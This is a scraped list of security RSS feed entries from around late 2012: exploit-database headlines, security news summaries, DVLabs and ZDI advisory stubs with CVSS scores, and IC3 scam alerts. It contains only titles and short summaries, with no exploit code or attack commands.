==> web - OpenCart v. 1.5.1.3 Full Path Disclosure Multiple

http://www.1337day.com/rss

==> web - Wordpress Plugins - my-link-order Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> remote - Buffalo Linkstation Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> web - Kordil EDMS 2.2.60rc3 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - FOOT Gestion CMS SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Wirtualna Polska S.A. (WP) XSS / CSRF Vulnerability

http://www.1337day.com/rss

==> web - ManageEngine MSPCentral 9 CSRF / Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - Tectia SSH USERAUTH Change Request Password Reset

http://www.1337day.com/rss

==> remote - Ektron 8.02 XSLT Transform Remote Code Execution

http://www.1337day.com/rss

==> web - Debliteck service Ltd sql injection Vulnerability

http://www.1337day.com/rss

==> local - Free WMA to MP3 converter 1.6 - Local buffer overflow [SEH]

http://www.1337day.com/rss

==> web - IM Sources Control Panel SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - 53KF sql injection Vulnerability

http://www.1337day.com/rss

==> web - Scarlet Daisy Web Content Management System sql injection Vulnerability

http://www.1337day.com/rss

==> web - TRENDNET TEW-432BRP CSRF Vulnerability

http://www.1337day.com/rss

==> local - Centrify Deployment Manager v2.1.0.283 File Overwrite Vulnerability

http://www.1337day.com/rss

==> web - Marketing Development Script SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - myBB KingChat Plugin SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - School CMS Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day

http://www.1337day.com/rss

==> web - Wordpress 3.4.2 Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Newscoop 4.0.2 Blind SQLi & Path Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - vBulletin 4.2.0 Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Buffalo Linkstation Privilege Escalation / Information Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability

http://www.1337day.com/rss

==> web - Tinymcpuk 0.3 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Ncentral 8.x Insecure Access / Unsalted Passwords / CSRF Vulnerabilities

http://www.1337day.com/rss

==> web - Kaseya 6.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Libsyn Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Symantec Messaging Gateway 9.5.3-3 Arbitrary File Download

http://www.1337day.com/rss

==> web - Symantec Messaging Gateway 9.5.3-3 CSRF Vulnerability

http://www.1337day.com/rss

==> web - FirePass SSL VPN Unauthenticated Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick

http://www.1337day.com/rss

==> web - E-MARSOUM SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Opera Web Browser 12.11 Crash PoC

http://www.1337day.com/rss

==> remote - MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://www.1337day.com/rss

==> remote - SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://www.1337day.com/rss

==> remote - MySQL Remote Preauth User Enumeration Zeroday

http://www.1337day.com/rss

==> remote - FreeFTPD Remote Authentication Bypass Zeroday Exploit

http://www.1337day.com/rss

==> remote - FreeSSHD Remote Authentication Bypass Zeroday Exploit

http://www.1337day.com/rss

==> dos / - MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://www.1337day.com/rss

==> remote - MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://www.1337day.com/rss

==> local - MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://www.1337day.com/rss

==> dos / - MySQL Denial of Service Zeroday PoC

http://www.1337day.com/rss

==> dos / - MySQL (Linux) Heap Based Overrun PoC Zeroday

http://www.1337day.com/rss

==> remote - IBM System Director Remote System Level Exploit

http://www.1337day.com/rss

==> dos / - Mozilla FireFox 17.0.1 Memory Corruption PoC

http://www.1337day.com/rss

==> web - jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> dos / - Android 4.0.3 <= Browser Remote Crash Exploit

http://www.1337day.com/rss

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier.

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials.

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS.

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through a simple VoIP security solution, despite outdated client infrastructure.

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security.

==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro.

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business.

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud.

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva.

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles.

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips.

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months.

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro.

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments, phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz.

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives.

==> PCI Council: Risk assessment methodology unique to company environment

http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment.

==> NASA to deploy whole-disk encryption following breach

http://feeds.pheedo.com/tt/1323 Stolen laptop contained the sensitive data on a large number of employees and contractors. The information was not encrypted.

==> Adobe investigates scope of customer forum breach

http://feeds.pheedo.com/tt/1323 Names, email addresses and encrypted passwords of thousands of customers may have been exposed in a breach of the software maker's customer forum.

==> Genpact boosts security management with SIEM tool

http://feeds.pheedo.com/tt/1323 An early adopter of SIEM technology in India, leading BPO firm Genpact's nine-year journey to SIEM nirvana forms the focus of this case study.

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (November 26, 2012)

http://www.ic3.gov/rss/news.xml

==> Holiday Shopping Tips

http://www.ic3.gov/rss/news.xml

==> Justice Department Officials Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (October 23, 2012)

http://www.ic3.gov/rss/news.xml

==> Smartphone Malware Safety Tips

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (September 19, 2012)

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud

http://www.ic3.gov/rss/news.xml

==> Lawyers' Identities Being Used For Fake Websites and Solicitations

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (August 08, 2012)

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Delivers Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (May 23, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 2011 Annual Report on Internet Crime Released

http://www.ic3.gov/rss/news.xml

==> Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (April 20, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (March 27, 2012)

http://www.ic3.gov/rss/news.xml

==> U.S. Law Firms Continue to be the Target of a Counterfeit Check Scheme

http://www.ic3.gov/rss/news.xml

==> Justice Department and FBI Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> New Variation on Telephone Collection Scam Related to Delinquent Payday Loans

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (February 17, 2012)

http://www.ic3.gov/rss/news.xml

==> Timeshare Marketing Scams

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Involving E-mail Intrusions to Facilitate Wire Transfers Overseas

http://www.ic3.gov/rss/news.xml

==> Joint FBI and DHS Public Service Announcement: Best Practices For Recovery From the Malicious Erasure of Files

http://www.ic3.gov/rss/news.xml

==> ZDI-CAN-1667: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1608: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1591: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1589: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1571: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1551: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1546: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1545: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1544: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1542: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1517: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1516: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1668: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1663: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1661: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:C/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1660: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1659: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1650: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1646: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1643: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1615: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1614: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1613: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1612: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1611: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1563: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1543: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1518: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1594: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1580: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1534: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

